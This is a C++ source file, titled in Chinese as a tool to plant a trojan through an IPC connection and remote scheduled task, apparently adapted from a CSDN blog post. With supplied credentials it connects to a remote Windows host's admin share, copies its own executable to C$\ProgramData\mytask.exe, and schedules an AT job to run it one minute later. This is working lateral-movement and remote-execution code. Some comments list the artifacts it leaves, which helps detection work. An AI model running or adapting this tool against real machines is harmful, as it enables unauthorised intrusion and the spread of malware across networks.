实现:ipc管道连接到远程计划任务种马
#pragma comment(lib, "mpr.lib")
#pragma comment(lib,"Netapi32.lib")
#include <windows.h>
#include <lm.h>
#include <tchar.h>
#include <stdio.h>
#include <Winnetwk.h>
#include <string>
#include <lmat.h>
//using namespace std;
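// Print a human-readable description of the Win32 status code that
// WNetAddConnection2 returned.
//   ret - the DWORD status value from the failed call.
// The buffer is declared wchar_t*, so the wide variant FormatMessageW is used
// (the original called the ANSI variant and then printed the ANSI bytes with
// wprintf's %s, which expects UTF-16 and produced garbage). The buffer is
// system-allocated and must be released with LocalFree, but only when the
// lookup succeeded; on failure the pointer would otherwise be uninitialised.
void GetError(DWORD ret) {
    wchar_t * pMsgBuf = NULL;
    DWORD len = FormatMessageW(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS
        , NULL, ret, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPWSTR)&pMsgBuf, 0, NULL);
    if (len == 0 || pMsgBuf == NULL) {
        // No text available for this code; still report the numeric value.
        wprintf(L"WNetAddConnection2 failed with error: %u\n", ret);
        return;
    }
    wprintf(L"WNetAddConnection2 failed with error: %u, %s \n", ret, pMsgBuf);
    LocalFree(pMsgBuf);
}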
// Entry point. Two argument forms are accepted (see the argc checks below):
//   prog <localname> <remotename> <username> <password>
//       maps \\<remotename> to the local name <localname> and stops there.
//   prog <remotename> <username> <password>
//       connects to \\<remotename> with the given credentials; on success it
//       copies this program's own executable to
//       \\<remotename>\c$\ProgramData\mytask.exe and registers an AT job on the
//       remote host (NetScheduleJobAdd) that runs c:\ProgramData\mytask.exe
//       one minute after the remote host's current time.
// Artifacts this leaves on the remote host, useful for detection: a network
// logon with the supplied account, a new file under the C$ admin share at
// ProgramData\mytask.exe, and a new AT scheduled job. In both forms the
// password is echoed in clear text to the console.
// Returns 0 in every case except the usage error, which exits with 1.
int wmain(int argc, wchar_t * argv[]) {
/*
DWORD WNetAddConnection2W(
LPNETRESOURCEW lpNetResource,
LPCWSTR lpPassword,
LPCWSTR lpUserName,
DWORD dwFlags
);
*/
DWORD dwRetVal; // status returned by WNetAddConnection2
std::wstring MyRemoteName; // UNC name built up as \\<host>
NETRESOURCE nr;
DWORD dwFlags;
MyRemoteName.append(L"\\\\");
if (argc != 5 && argc != 4) {
wprintf(L"Usage: %s <localname> <remotename> <username> <password>\n",argv[0]);
wprintf(L"Usage: %s <remotename> <username> <password>\n",argv[0]);
exit(1);
}
if (argc == 5) {
// Five-argument form: map the remote resource to a local name only.
MyRemoteName.append(argv[2]);
wprintf(L"Calling WNetAddConnection2 with\n");
wprintf(L" lpLocalName = %s\n", argv[1]);
wprintf(L" lpRemoteName = %s\n", MyRemoteName.c_str());
wprintf(L" lpUsername = %s\n", argv[3]);
wprintf(L" lpPassword = %s\n", argv[4]); // password printed in clear text
memset(&nr, 0, sizeof(NETRESOURCE));
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = argv[1];
nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str();
nr.lpProvider = NULL;
dwFlags = CONNECT_TEMPORARY; // temporary (non-persistent) connection
dwRetVal = WNetAddConnection2(&nr, argv[4], argv[3], dwFlags);
if (dwRetVal == NO_ERROR) {
wprintf(L"Connection added to %s\n", nr.lpRemoteName);
}
else {
GetError(dwRetVal);
}
}
else if (argc == 4) {
// Four-argument form: connect to \\<host> without a local name.
MyRemoteName.append(argv[1]);
wprintf(L"Calling WNetAddConnection2 with\n");
wprintf(L"lpRemoteName = %s\n", (LPWSTR)MyRemoteName.c_str());
wprintf(L"lpUsername = %s\n", argv[2]);
wprintf(L"lpPassword = %s\n", argv[3]); // password printed in clear text
// Zero the structure.
memset(&nr, 0, sizeof(NETRESOURCE));
// Fill in the four fields the call needs.
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL; // no local drive mapping
nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str(); // remote resource to connect to
nr.lpProvider = NULL;
dwFlags = CONNECT_TEMPORARY; // temporary (non-persistent) connection
dwRetVal = WNetAddConnection2(&nr,argv[3], argv[2], dwFlags);
if (dwRetVal == NO_ERROR){
// Connection to the remote host established.
wprintf(L"Connection added to %s\n", nr.lpRemoteName);
// RemoteFilePath is the destination path on the remote host.
std::wstring RemoteFilePath;
// NOTE: append() mutates MyRemoteName itself; nr.lpRemoteName points into
// that buffer and is not used after this line. A separate
// MyRemoteServerName is built below for the Net* calls for that reason.
RemoteFilePath = MyRemoteName.append(L"\\c$\\ProgramData\\mytask.exe"); // e.g. \\192.168.1.152\c$\ProgramData\mytask.exe
// Copy a file into that directory on the remote machine.
wchar_t LocalModuleEXE[MAX_PATH];
GetModuleFileName(NULL, LocalModuleEXE, MAX_PATH); // full path of the currently running executable; this is the file that gets copied
if (CopyFile(LocalModuleEXE, RemoteFilePath.c_str(), FALSE) != 0) { // bFailIfExists = FALSE: overwrite if present
wprintf(L"copyfile successful\n");
// Query the remote server's current time so the job can be scheduled
// relative to it.
LPTIME_OF_DAY_INFO ti = NULL;
std::wstring MyRemoteServerName;
// MyRemoteServerName holds the plain \\<host> form used by the Net* calls.
MyRemoteServerName.append(L"\\\\");
MyRemoteServerName.append(argv[1]);
// NOTE(review): the buffer NetRemoteTOD allocates into ti is never
// released with NetApiBufferFree; it lives until process exit.
if (NetRemoteTOD(MyRemoteServerName.c_str(), (LPBYTE *)&ti) == NERR_Success) {
wprintf(L"Get remote time successful\n");
// Build the AT job description.
//DWORD day = 1;
wchar_t command[] = L"c:\\ProgramData\\mytask.exe";
AT_INFO at; // job description
at.DaysOfWeek = 0; // no day mask: a one-shot job rather than a recurring one
at.DaysOfMonth = 0;
at.Flags = JOB_NONINTERACTIVE; // run without an interactive desktop
// JobTime is milliseconds after midnight. The code treats tod_hours as
// UTC and shifts it by tod_timezone (minutes, positive west of UTC) to get
// the remote host's local hour, wrapped with % 24, then adds the current
// minute + 1 -- i.e. roughly one minute from now on the remote clock.
// Confirm the tod_hours/tod_timezone semantics against TIME_OF_DAY_INFO.
at.JobTime = ((ti->tod_hours + (-ti->tod_timezone) / 60) % 24) * 60 * 60 * 1000 + (ti->tod_mins + 1) * 60 * 1000;
at.Command = command; // command line the job executes
DWORD id; // job id assigned by the remote host
if(NetScheduleJobAdd(MyRemoteServerName.c_str(),(LPBYTE)&at,&id) == NERR_Success){
wprintf(L"Job add successful\n");
}
else {
wprintf(L"Job add failed\n");
}
}
else {
wprintf(L"Get remote time failed\n");
}
}
else {
wprintf(L"copyfile failed\n");
}
}
else {
GetError(dwRetVal);
}
}
return 0;
}
参考文章:https://blog.csdn.net/weixin_34408624/article/details/86248485